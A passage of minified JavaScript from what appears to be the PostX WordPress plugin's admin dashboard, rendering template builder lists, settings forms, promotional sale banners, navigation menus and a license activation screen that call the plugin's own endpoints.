ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"title"},(0,r.createElement)("span",null,e.name),(0,r.createElement)("div",{className:"parent"},e.parent)),e.pro&&!t.active?(0,r.createElement)("a",{className:"ultp-upgrade-pro-btn",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):e.pro&&T?(0,r.createElement)("a",{className:"ultp-btn-success",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Get License","ultimate-post")):(0,r.createElement)("span",{onClick:()=>{A(e.ID),te(e.ID,"https://postxkit.wpxpo.com/"+e.live)},className:"btnImport cursor"}," ",i.ZP.arrow_down_line,__("Import","ultimate-post"),z&&z==e.ID?(0,r.createElement)("span",{className:"dashicons dashicons-update rotate"}):"")),(0,r.createElement)("div",{className:"listOverlay bg-image-aspect",style:{backgroundImage:`url(${a})`}},(0,r.createElement)("div",{className:"ultp-list-dark-overlay"},(0,r.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",href:o,target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))))},re=()=>"all"!=g&&"archive"!=g?(N(g),v(g),void((Z.length<=0||"front_page"==g&&U.length<=0)&&J())):(0,r.createElement)("div",{className:"ultp-builder-items"},("all"==g?["front_page",...d]:"archive"==g?d.filter((e=>"singular"!=e)):[g]).map(((e,n)=>(0,r.createElement)("div",{key:n,onClick:()=>{N(e),v(e),(Z.length<=0||"front_page"==e&&U.length<=0)&&J()}},(0,r.createElement)("div",{className:"newScreen ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"ultp_h6"},e)),(0,r.createElement)("div",{className:"listOverlays"},(0,r.createElement)("img",{src:t.url+`addons/builder/assets/icons/template/${e.toLowerCase()}.svg`}),(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"}),__("Add","ultimate-post")," ",e)))))));return(0,r.createElement)("div",{className:"ultp-builder-dashboard"},K.state&&(0,r.createElement)(l.Z,{delay:2e3,toastMessages:K,setToastMessages:X}),!n&&(0,r.createElement)("div",{className:"ultp-builder-dashboard__content ultp-builder-tab"},(0,r.createElement)("div",{className:"ultp-builder-tab__option"},(0,r.createElement)("span",{onClick:()=>(M(!0),void wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(ee(),M(!1),X({status:"success",messages:[e.message],state:!0}))}))),className:"ultp-popup-sync"},(0,r.createElement)("i",{className:"dashicons dashicons-update-alt"+(S?" rotate":"")}),__("Synchronize","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"all"==g&&{className:"active"},{onClick:()=>{v("all"),w(!1),N("")}}),(0,r.createElement)("span",{className:"dashicons dashicons-admin-home"})," ",__("All Template","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"front_page"==g&&{className:"active"},{onClick:()=>{v("front_page"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/front_page.svg"}),__("Front Page","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"singular"==g&&{className:"active"},{onClick:()=>{v("singular"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/singular.svg"}),__("Singular","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"search"==g&&{className:"active"},{onClick:()=>{v("search"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/search.svg"}),__("Search Result","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"archive"==g&&{className:"active"},{onClick:()=>{v("archive"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/archive.svg"}),__("Archive","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"category"==g&&{className:"active"},{onClick:()=>{v("category"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/category.svg"}),__("Category","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"author"==g&&{className:"active"},{onClick:()=>{v("author"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/author.svg"}),__("Authors","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"post_tag"==g&&{className:"active"},{onClick:()=>{v("post_tag"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/tag.svg"}),__("Tags","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"date"==g&&{className:"active"},{onClick:()=>{v("date"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/date.svg"}),__("Date","ultimate-post"))),(0,r.createElement)("li",(0,a.Z)({},"header"==g&&{className:"active"},{onClick:()=>{v("header"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/header.svg"}),__("Header","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"footer"==g&&{className:"active"},{onClick:()=>{v("footer"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/footer.svg"}),__("Footer","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"404"==g&&{className:"active"},{onClick:()=>{v("404"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/404.svg"}),"404"))),(0,r.createElement)("div",{className:"ultp-builder-tab__content ultp-builder-tab__template"},(0,r.createElement)("div",{className:"ultp-builder-tab__heading"},(0,r.createElement)("div",{className:"ultp-builder-heading__title"},(""!=L||_)&&G&&(0,r.createElement)("span",{onClick:()=>{q(!1),w(!1),N("")}}," ",i.ZP.leftAngle2,__("Back","ultimate-post")),(0,r.createElement)("div",{className:"ultp_h5 heading"},__("All","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Templates","ultimate-post"))),f.length>0&&""==L&&!_?(0,r.createElement)("button",{className:"cursor ultp-primary-button ultp-builder-create-btn",onClick:()=>{w(!0),q(!0),N("all"==g||"archive"==g?"":g)}}," ","+ ",__("Create","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Template","ultimate-post")):O?"":(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:170,unit1:"px",size2:42,unit2:"px",br:4}})),(0,r.createElement)("div",{className:"ultp-tab__content active"},O?""==L?((e="all")=>{let t=0;return(0,r.createElement)("div",{className:"ultp-template-list__tab"},0==_&&f.length>0?f.map(((n,a)=>{const o=((e,t)=>{let n=[];return e?.id&&void 0!==b[e?.type]&&b[e.type][e.id]?.map(((e,t)=>{e&&(n=e.split("/"))})),n})(n);if("all"==e||e==n.type||e==o[2]&&n.type==o[1]&&!["header","footer"].includes(n.type))return t++,(0,r.createElement)("div",{key:a,className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)("div",{className:"ultp-template-list__meta"},(0,r.createElement)("div",null,(0,r.createElement)("span",null,"front_page"==n.type?"Front Page":n.type," ",":")," ",n.title," ",(0,r.createElement)("span",null,"ID :")," #",n.id),n.id&&void 0!==b[n.type]&&(0,r.createElement)("div",{className:"ultp-condition__previews"},"(",(b[n.type][n.id]||[]).map(((e,t)=>{if(e){const n=e.split("/");return(0,r.createElement)(r.Fragment,{key:t},0==t?"":", ",(0,r.createElement)("span",null,void 0!==n[2]?n[2]:n[1]))}})),")")),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},"front_page"!=n.type&&"404"!=n.type&&(0,r.createElement)("button",{onClick:()=>{m(n.type),k(n.id)},className:"ultp-condition__edit"},__("Conditions","ultimate-post")),(0,r.createElement)("a",{className:"status"}," ","publish"==n.status?"Published":n.status),(0,r.createElement)("a",{href:n?.edit?.replaceAll("&amp;","&"),className:"ultp-condition-action",target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"duplicate",section:"builder"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to delete this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"delete",section:"builder"}}).then((e=>{e.success&&(h(f.filter((e=>e.id!=n.id))),X({status:"error",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),(0,r.createElement)("span",{onClick:e=>{D(!W),F(n.id)}},(0,r.createElement)("span",{className:"dashicons dashicons-ellipsis ultp-builder-dashboard__action ultp-reserve-button"})),V==n.id&&W&&(0,r.createElement)("span",{className:"ultp-builder-action__active ultp-reserve-button",onClick:e=>{F(""),D(!1),e.preventDefault(),confirm(`Are you sure you want to ${"publish"==n.status?"draft":"publish"} this template?`)&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"status",status:"publish"==n.status?"draft":"publish"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-open-folder ultp-reserve-button"})," ",__("Set to","ultimate-post")," ","publish"==n.status?__("Draft","ultimate-post"):__("Publish","ultimate-post")))))})):re(),0==_&&f.length>0&&!t&&re())})(g):(0,r.createElement)("div",{className:`premadeScreen ${L&&" ultp-builder-items ultp"+L}`},(0,r.createElement)("div",{className:"ultp-list-blank-img ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"ultp-item-list-overlay ultp-p20 ultp-premade-img__blank"},(0,r.createElement)("img",{src:t.url+"assets/img/dashboard/start-scratch.svg"}),(0,r.createElement)("a",{className:"cursor",onClick:e=>{e.preventDefault(),te()}},(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"})," ",__("Start from Scratch","ultimate-post")," ")))),"front_page"==L?U.map(((e,t)=>ae(e,t))):Z.map(((e,t)=>{if("archive"!=e.builder_type&&e.builder_type==L||"archive"==e.builder_type&&(e.archive_type==L||"archive"==L))return ae(e,t)}))):(0,r.createElement)("div",{className:"skeletonOverflow",label:__("Loading…","ultimate-post")},Array(6).fill(1).map(((e,t)=>(0,r.createElement)("div",{key:t,className:"ultp-template-list__tab",style:{marginBottom:"15px"}},(0,r.createElement)("div",{className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"%",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},(2==t||4==t)&&(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:56,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:25,unit1:"px",size2:12,unit2:"px",br:2}}))))))))))),y&&(0,r.createElement)("div",{className:"ultp-condition-wrapper ultp-condition--active"},(0,r.createElement)("div",{className:"ultp-condition-popup ultp-popup-wrap"},(0,r.createElement)("button",{className:"ultp-save-close",onClick:()=>k("")},i.ZP.close_line),Object.keys(E).length&&u?(0,r.createElement)(c.Z,{type:u,id:"yes"==y?I:y,settings:b,defaults:E,setShowCondition:"yes"==n?k:""}):(0,r.createElement)("div",{className:"ultp-modal-content"},(0,r.createElement)("div",{className:"ultp-condition-wrap"},(0,r.createElement)("div",{className:"ultp_h3 ultp-condition-wrap-heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:330,unit1:"px",size2:22,unit2:"px",br:2}})),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:460,unit1:"px",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-condition-items"},(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}}))))))),B&&(0,s.cs)({tags:"builder_popup",func:e=>{H(e)},data:{icon:"template_lock.svg",title:__("Create Unlimited Templates With PostX Pro","ultimate-post"),description:__("We are sorry. Unfortunately, the free version of PostX lets you create only one template. Please upgrade to a pro version that unlocks the full capabilities of the dynamic site builder.","ultimate-post")}}))}},3944:(e,t,n)=>{"use strict";n.d(t,{Z:()=>p});var a=n(7294),r=n(1383),o=n(4766),i=n(4482),l=n(8949),s=n(356);n(8350);const{__}=wp.i18n,p=()=>{const[e,t]=(0,a.useState)({}),[n,p]=(0,a.useState)({state:!1,status:""}),[c,d]=(0,a.useState)(!1);(0,a.useEffect)((()=>{m()}),[]);const u=(0,r.t)(),m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&t(e.settings)}))};return(0,a.createElement)("div",{className:"ultp-dashboard-general-settings-container"},(0,a.createElement)("div",{className:"ultp-general-settings ultp-dash-item-con"},(0,a.createElement)("div",null,n.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:n,setToastMessages:p}),(0,a.createElement)("div",{className:"ultp_h5 heading"},__("General Settings","ultimate-post")),Object.keys(e).length>0?(0,a.createElement)("form",{onSubmit:e=>{d(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{e.success&&p({status:"success",messages:[e.message],state:!0}),d(!1)}))},action:""},(0,i.DC)(i.u4,e),(0,a.createElement)("div",{className:"ultp-data-message"}),(0,a.createElement)("div",null,(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(c?"onloading":"")},__("Save Settings","ultimate-post"),c&&o.ZP.refresh))):(0,a.createElement)("div",{className:"skeletonOverflow"},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:150,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:"",unit1:"",size2:34,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:350,unit1:"px",size2:20,unit2:"px",br:2}})))),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:120,unit1:"px",size2:36,unit2:"px",br:2}})))),(0,a.createElement)("div",{className:"ultp-general-settings-content-right"},(0,a.createElement)(i.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"})))}},3546:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(2044);n(8009);const{__}=wp.i18n,o=()=>{const[e,t]=(0,a.useState)(ultp_dashboard_pannel.helloBar);if(new Date>=new Date("2025-06-23")&&(new Date,new Date("2025-07-09")),"hide"===e||ultp_dashboard_pannel.active)return null;const n=[{title:__("Final Hour Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"final_hour_sale",startDate:new Date("2025-08-04"),endDate:new Date("2025-08-14")},{title:__("Massive Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"massive_sale",startDate:new Date("2025-08-18"),endDate:new Date("2025-08-29")},{title:__("Flash Sale is live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"flash_sale",startDate:new Date("2025-09-01"),endDate:new Date("2025-09-17")},{title:__("Exclusive Deals Live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"exclusive_deals",startDate:new Date("2025-09-21"),endDate:new Date("2025-09-30")},{title:__("Booming Black Friday Deals:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 60% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"black_friday_sale",startDate:new Date("2025-11-05"),endDate:new Date("2025-12-10")},{title:__("Fresh New Year Savings:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 55% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"new_year_sale",startDate:new Date("2026-01-01"),endDate:new Date("2026-02-15")}].find((e=>{const t=new Date;return t>=e.startDate&&t<=e.endDate}));let o=0;if(n){const e=new Date;o=Math.floor((n?.endDate-e)/1e3)}return(0,a.createElement)("div",null,n&&(0,a.createElement)("div",{className:"ultp-setting-hellobar"},(0,a.createElement)("span",{className:"dashicons dashicons-bell ultp-ring"}),n.title," ",n.subtitle," ",(0,a.createElement)("strong",null,n.offer)," ",n.product," ",(0,a.createElement)("a",{href:(0,r.Z)({utmKey:n.utmKey,hash:"pricing"}),target:"_blank",rel:"noreferrer"},n.link_text,"   ➤"),(0,a.createElement)("button",{type:"button",className:"helobarClose",onClick:()=>{return e=o,t("hide"),void wp.apiFetch({path:"/ultp/hello_bar",method:"POST",data:{type:"hello_bar",duration:e}});var e},"aria-label":__("Close notification","ultimate-post"),style:{background:"none",border:"none",padding:0,cursor:"pointer"}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 20 20"},(0,a.createElement)("path",{stroke:"currentColor",d:"M15 5 5 15M5 5l10 10"})))))}},1383:(e,t,n)=>{"use strict";n.d(t,{t:()=>_});var a=n(7294),r=n(3935),o=n(3100),i=n(4766),l=n(860),s=n(7191),p=n(8351),c=n(3644),d=(n(9780),n(3944)),u=n(3546),m=(n(2156),n(2470)),f=n(3701),h=n(5957),g=n(3554),v=n(58);const{__}=wp.i18n;function _(){const e=(0,a.useRef)(!1);return(0,a.useEffect)((()=>(e.current=!0,()=>e.current=!1)),[]),e}document.body.contains(document.getElementById("ultp-dashboard"))&&r.render((0,a.createElement)(a.StrictMode,null,(0,a.createElement)((()=>{const[e,t]=(0,a.useState)("xx"),[n,r]=(ultp_dashboard_pannel.status,ultp_dashboard_pannel.expire,(0,a.useState)(!1)),_=[{link:"#home",label:__("Dashboard","ultimate-post"),showin:"both"},{link:"#startersites",label:__("Starter Sites","ultimate-post"),showin:"both",tag:"New"},{link:"#builder",label:__("Site Builder","ultimate-post"),showin:ultp_dashboard_pannel.settings.hasOwnProperty("ultp_builder")&&"false"!=ultp_dashboard_pannel.settings.ultp_builder?"both":"none",showhide:!0},{link:"#blocks",label:__("Blocks","ultimate-post"),showin:"both"},{link:"#addons",label:__("Add-ons","ultimate-post"),showin:"both"},{link:"#settings",label:__("Settings","ultimate-post"),showin:"both"}],w=[{label:__("Get Support","ultimate-post"),icon:"dashicons-phone",link:"https://www.wpxpo.com/contact/?utm_source=postx-menu&utm_medium=all_que-support&utm_campaign=postx-dashboard"},{label:__("Welcome Guide","ultimate-post"),icon:"dashicons-megaphone",link:ultp_dashboard_pannel.setup_wizard_link},{label:__("Join Community","ultimate-post"),icon:"dashicons-facebook-alt",link:"https://www.facebook.com/groups/gutenbergpostx"},{label:__("Feature Request","ultimate-post"),icon:"dashicons-email-alt",link:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=all_que-FR&utm_campaign=postx-dashboard"},{label:__("Youtube Tutorials","ultimate-post"),icon:"dashicons-youtube",link:"https://www.youtube.com/watch?v=_GfXTvSdJTk&list=PLPidnGLSR4qcAwVwIjMo1OVaqXqjUp_s4"},{label:__("Documentation","ultimate-post"),icon:"dashicons-book",link:"https://wpxpo.com/docs/postx/?utm_source=postx-menu&utm_medium=all_que-docs&utm_campaign=postx-dashboard"},{label:__("What’s New","ultimate-post"),icon:"dashicons-edit",link:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=all_que-roadmap&utm_campaign=postx-dashboard"}],b=e=>{if(e.target&&!e.target.classList?.contains("ultp-reserve-button")&&e.target.href&&e.target.href.indexOf("page=ultp-settings#")>0){const n=e.target.href.split("#");n[1]&&(t(n[1]),window.scrollTo({top:0,behavior:"smooth"}))}e.target.closest(".dash-faq-container")||e.target.classList?.contains("ultp-reserve-button")||r(!1)},[x,y]=(0,a.useState)(window.location.hash||e);(0,a.useEffect)((()=>{const e=()=>{y(window.location.hash||"#welcome")};return window.location.hash||(window.location.hash=_[0].link.replace("#","")),window.addEventListener("hashchange",e),()=>{window.removeEventListener("hashchange",e)}}),[]),(0,a.useEffect)((()=>{const n=x.replace("#","");n&&n!==e&&t(n)}),[x,e]),(0,a.useEffect)((()=>((()=>{let e=window.location.href;e.includes("page=ultp-settings#")&&(e=e.split("page=ultp-settings#"),e[1]&&t(e[1]))})(),document.addEventListener("mousedown",b),()=>document.removeEventListener("mousedown",b))),[]);const[k,E]=(0,a.useState)({success:!1,license:""});return(0,a.createElement)("div",{className:"ultp-menu-items-wrap"},(0,a.createElement)(u.Z,null),(0,a.createElement)("div",{className:"ultp-setting-header"},(0,a.createElement)("div",{className:"ultp-setting-logo"},(0,a.createElement)("img",{className:"ultp-setting-header-img",loading:"lazy",src:ultp_dashboard_pannel.url+"/assets/img/logo-new.png",alt:"PostX"}),(0,a.createElement)("span",{className:"ultp-setting-version"},ultp_dashboard_pannel.version)),(0,a.createElement)("div",{className:"ultp-menu-items",id:"ultp-dashboard-ultp-menu-items"},_.map(((t,n)=>"both"==t.showin||"menu"==t.showin||t.showhide?(0,a.createElement)("a",{href:t.link,style:{display:"none"==t.showin?"none":""},id:"ultp-dasnav-"+t.link.replace("#",""),key:n,className:(t.link=="#"+e?"current":"")+" ultp-menu-item",onClick:()=>y(t.link.replace("#",""))},t.label,t.tag&&(0,a.createElement)("span",{className:"ultp-menu-item-tag"},t.tag)):""))),(0,a.createElement)("div",{className:"ultp-secondary-menu"},(0,a.createElement)("a",{href:"#plugins",className:"ultp-menu-item "+(["plugins","#plugins"].includes(x)?"current":""),onClick:()=>y("plugins")},i.ZP.connect,__("Our Plugins","ultimate-post")),!ultp_dashboard_pannel?.active&&(0,a.createElement)("a",{href:(0,o.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),className:"ultp-secondary-button ultp-pro-button"},__("Upgrade Pro","ultimate-post"),i.ZP.unlock)),(0,a.createElement)("div",{className:"ultp-dash-faq-con"},(0,a.createElement)("span",{onClick:()=>r(!n),className:"ultp-dash-faq-icon ultp-reserve-button dashicons dashicons-editor-help"}),n&&(0,a.createElement)("div",{className:"dash-faq-container"},w.map(((e,t)=>(0,a.createElement)("a",{key:t,href:e.link,target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:`dashicons ${e.icon}`}),e.label)))))),(0,a.createElement)("div",{className:"ultp-settings-container "+("startersites"==e?"ultp-settings-container-startersites":"")},(0,a.createElement)("ul",{className:"ultp-settings-content"},(0,a.createElement)("li",{className:"current"},"xx"!=e&&("home"==e||!["builder","startersites","integrations","saved-templates","custom-font","addons","blocks","settings","tutorials","license","support","plugins"].includes(e))&&(0,a.createElement)(c.Z,null),"saved-templates"==e&&(0,a.createElement)(h.Z,{type:"ultp_templates"}),"custom-font"==e&&(0,a.createElement)(h.Z,{type:"ultp_custom_font"}),"builder"==e&&(0,a.createElement)(p.Z,null),"startersites"==e&&(0,a.createElement)(g.Z,null),"addons"==e&&(0,a.createElement)(l.Z,{integrations:!0}),"blocks"==e&&(0,a.createElement)(s.Z,null),"settings"==e&&(0,a.createElement)(d.Z,null),"license"==e&&(0,a.createElement)(m.C,{licenseData:k,setLicenseData:E}),"support"==e&&(0,a.createElement)(v.Z,null),"plugins"==e&&(0,a.createElement)(f.I,null))),(0,a.createElement)(v.Z,null)),!ultp_dashboard_pannel.active&&(()=>{const e=(new Date).setHours(0,0,0,0)/1e3,t=345600,n=new Date("2024-05-21").setHours(0,0,0,0)/1e3,a=new Date("2024-07-22").setHours(0,0,0,0)/1e3;if(e<n||e>a)return!1;if(ultp_dashboard_pannel.settings.activated_date&&Number(ultp_dashboard_pannel.settings.activated_date)+t>=e)return!1;const r=Number(localStorage.getItem("ultpCouponDiscount"));return r?r<=e&&e<=r+t||e>=r+691200&&(localStorage.setItem("ultpCouponDiscount",String(e)),!0):(localStorage.setItem("ultpCouponDiscount",String(e)),!0)})()&&(0,a.createElement)("a",{className:"ultp-discount-wrap",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-discount&utm_medium=coupon&utm_campaign=postx-dashboard&pux_link=postxdbcoupon#pricing",target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:"ultp-discount-text"},__("Get Discount","ultimate-post"))))}),null)),document.getElementById("ultp-dashboard"))},2470:(e,t,n)=>{"use strict";n.d(t,{C:()=>o});var a=n(7294),r=n(356);n(977);const{__}=wp.i18n,o=({licenseData:e,setLicenseData:t})=>{const[n,r]=(0,a.useState)(""),[o,l]=(0,a.useState)(!1),[s,p]=(0,a.useState)(!0);return(0,a.useEffect)((()=>{(async()=>{p(!0);const e=await(async()=>{try{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_get_license_data"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw l(!0),new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.success)return a.data}catch(e){return null}})();e?.license_data&&t(e?.license_data),p(!1)})()}),[]),(0,a.useEffect)((()=>{"valid"===e?.license?ultp_dashboard_pannel.active=!0:""!=e.license&&"valid"!=e?.license&&(ultp_dashboard_pannel.active=!1)}),[e]),(0,a.createElement)("div",{className:"ultp-license"},s?(0,a.createElement)("div",{className:"ultp-license__activation",style:{display:"flex",flexDirection:"column",gap:"16px",paddingTop:"50px !important"}},(0,a.createElement)(c,{width:"250px",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px",style:{marginTop:"10px"}}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"})):(0,a.createElement)(i,{proUpdate:o,licenseKey:n,setLicenseKey:r,licenseData:e,setLicenseData:t}),(0,a.createElement)(u,null))},i=({proUpdate:e,licenseKey:t,setLicenseKey:n,licenseData:o,setLicenseData:i})=>{const[p,c]=(0,a.useState)(!1),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)({state:!1,status:"",messages:[]}),h=async()=>{try{c(!0);const e=await g(t);e?.status&&(i(e?.license_data),window.location.reload()),f({status:e.status?"success":"error",messages:[e?.data||"Some issues occured"],state:!0}),n(""),c(!1),u(!1)}catch(e){u(!0),f({status:"error",messages:["Some issues occured"],state:!0}),console.error("License Activation Error: ",e)}},g=async e=>{const t=`${ultp_dashboard_pannel.ajax}`,n=new URLSearchParams({action:"edd_ultp_activate_license",security:ultp_dashboard_pannel.nonce,license_key:e}),a=await fetch(t,{method:"POST",body:n,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!a.ok)throw new Error(`HTTP error! Status: ${a.status}`);return await a.json()};return(0,a.createElement)("div",{className:"ultp-license__activation"},(0,a.createElement)("div",{className:"ultp-license__title"},__(e?"Notice: Upgrade PostX Pro plugin":"Ready to Use PostX Pro ?","ultimate-post")),m.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:m,setToastMessages:f}),!e&&(0,a.createElement)(a.Fragment,null,"valid"!==o?.license?(0,a.createElement)("div",{className:"ultp-license__form"},(0,a.createElement)("input",{type:"password",id:"ultp-license-key",placeholder:__("Enter Your License Key 